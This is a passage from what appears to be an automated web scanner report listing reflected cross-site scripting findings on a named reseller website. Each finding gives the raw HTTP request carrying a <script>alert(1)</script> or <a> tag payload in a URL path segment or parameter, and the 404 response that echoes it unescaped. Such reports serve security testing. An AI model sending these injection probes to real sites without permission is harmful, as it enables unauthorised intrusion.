The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload e5499<script>alert(1)</script>23b145036fd was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themese5499<script>alert(1)</script>23b145036fd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:55 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themese5499<script>alert(1)</script>23b145036fd/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2054. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload ea20c<script>alert(1)</script>b3f80660ea4 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmosea20c<script>alert(1)</script>b3f80660ea4/images/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:07 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmosea20c<script>alert(1)</script>b3f80660ea4/images/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2055. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload db2a9<script>alert(1)</script>412066115dc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/imagesdb2a9<script>alert(1)</script>412066115dc/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:18 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/imagesdb2a9<script>alert(1)</script>412066115dc/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2056. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [REST URL parameter 6]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of REST URL parameter 6 is copied into the HTML document as plain text between tags. The payload 2cdce<script>alert(1)</script>01bd23ea19d was submitted in the REST URL parameter 6. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/search.php2cdce<script>alert(1)</script>01bd23ea19d?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:28 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php2cdce<script>alert(1)</script>01bd23ea19d?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2057. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload 1b3d3<a>1849719ba71 was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1b3d3<a>1849719ba71&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:34 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search1b3d3<a>1849719ba71&opt=2 was not found on this server.</p>
...[SNIP]...

2.2058. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload a6f34<a>97627ff6af9 was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...a6f34<a>97627ff6af9&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:15 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...a6f34<a>97627ff6af9&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2059. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload b1e57<script>alert(1)</script>2b611a9d9be was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b1e57<script>alert(1)</script>2b611a9d9be=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:05:59 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2&b1e57<script>alert(1)</script>2b611a9d9be=1 was not found on this server.</p>
...[SNIP]...

2.2060. http://www.resellerbase.com/detail/29/themes/kosmos/images/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/images/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload bff9e<a>e7cd7013c3a was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bff9e<a>e7cd7013c3a HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/images/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:49 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/images/search.php?keyword=search...&Submit3=Search&opt=2bff9e<a>e7cd7013c3a was not found on this server.</p>
...[SNIP]...

2.2061. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 7d57a<script>alert(1)</script>87bfe519ee9 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail7d57a<script>alert(1)</script>87bfe519ee9/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:26 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail7d57a<script>alert(1)</script>87bfe519ee9/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2062. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c5a27<script>alert(1)</script>c074d4a8941 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29c5a27<script>alert(1)</script>c074d4a8941/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:36 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29c5a27<script>alert(1)</script>c074d4a8941/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2063. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 3 is copied into the HTML document as plain text between tags. The payload b7da8<script>alert(1)</script>621fdc3e9e1 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themesb7da8<script>alert(1)</script>621fdc3e9e1/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:54 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themesb7da8<script>alert(1)</script>621fdc3e9e1/kosmos/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2064. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 4 is copied into the HTML document as plain text between tags. The payload e7d61<script>alert(1)</script>371dda27184 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmose7d61<script>alert(1)</script>371dda27184/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:10 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmose7d61<script>alert(1)</script>371dda27184/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2065. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 23f55<script>alert(1)</script>29ec97c6763 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/search.php23f55<script>alert(1)</script>29ec97c6763?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:07:27 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php23f55<script>alert(1)</script>29ec97c6763?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2066. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [Submit3 parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of the Submit3 request parameter is copied into the HTML document as plain text between tags. The payload ac7df<a>9a67f36d21a was submitted in the Submit3 parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Searchac7df<a>9a67f36d21a&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:40 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Searchac7df<a>9a67f36d21a&opt=2 was not found on this server.</p>
...[SNIP]...

2.2067. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [keyword parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of the keyword request parameter is copied into the HTML document as plain text between tags. The payload cabab<a>25cbdb077eb was submitted in the keyword parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...cabab<a>25cbdb077eb&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:19 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...cabab<a>25cbdb077eb&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

2.2068. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload 25d93<script>alert(1)</script>525b8fae030 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&25d93<script>alert(1)</script>525b8fae030=1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:04 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2&25d93<script>alert(1)</script>525b8fae030=1 was not found on this server.</p>
...[SNIP]...

2.2069. http://www.resellerbase.com/detail/29/themes/kosmos/search.php [opt parameter]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/kosmos/search.php

Issue detail

The value of the opt request parameter is copied into the HTML document as plain text between tags. The payload dc3d3<a>57ba6b20ee1 was submitted in the opt parameter. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2dc3d3<a>57ba6b20ee1 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/kosmos/
Cookie: COOKIE_SORT_ORDER=asc; COOKIE_SORT_BY=title; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:04:58 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail/29/themes/kosmos/search.php?keyword=search...&Submit3=Search&opt=2dc3d3<a>57ba6b20ee1 was not found on this server.</p>
...[SNIP]...

2.2070. http://www.resellerbase.com/detail/29/themes/search.php [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.resellerbase.com
Path:   /detail/29/themes/search.php

Issue detail

The value of REST URL parameter 1 is copied into the HTML document as plain text between tags. The payload 680a8<script>alert(1)</script>6f2fb791fcd was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /detail680a8<script>alert(1)</script>6f2fb791fcd/29/themes/search.php?keyword=search...&Submit3=Search&opt=2 HTTP/1.1
Host: www.resellerbase.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0;)
Connection: close
Referer: http://www.resellerbase.com/detail/29/themes/
Cookie: COOKIE_SORT_ORDER=deleted; COOKIE_SORT_BY=deleted; PHPSESSID=cf5c4507edd5b99714d5ffcca245c5da;

Response

HTTP/1.0 404 Not Found
Date: Wed, 17 Nov 2010 23:06:32 GMT
Server: Apache/2
X-Powered-By: PHP/5.2.14
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Error 404 - Page Not
...[SNIP]...
<p>The requested URL /detail680a8<script>alert(1)</script>6f2fb791fcd/29/themes/search.php?keyword=search...&Submit3=Search&opt=2 was not found on this server.</p>
...[SNIP]...

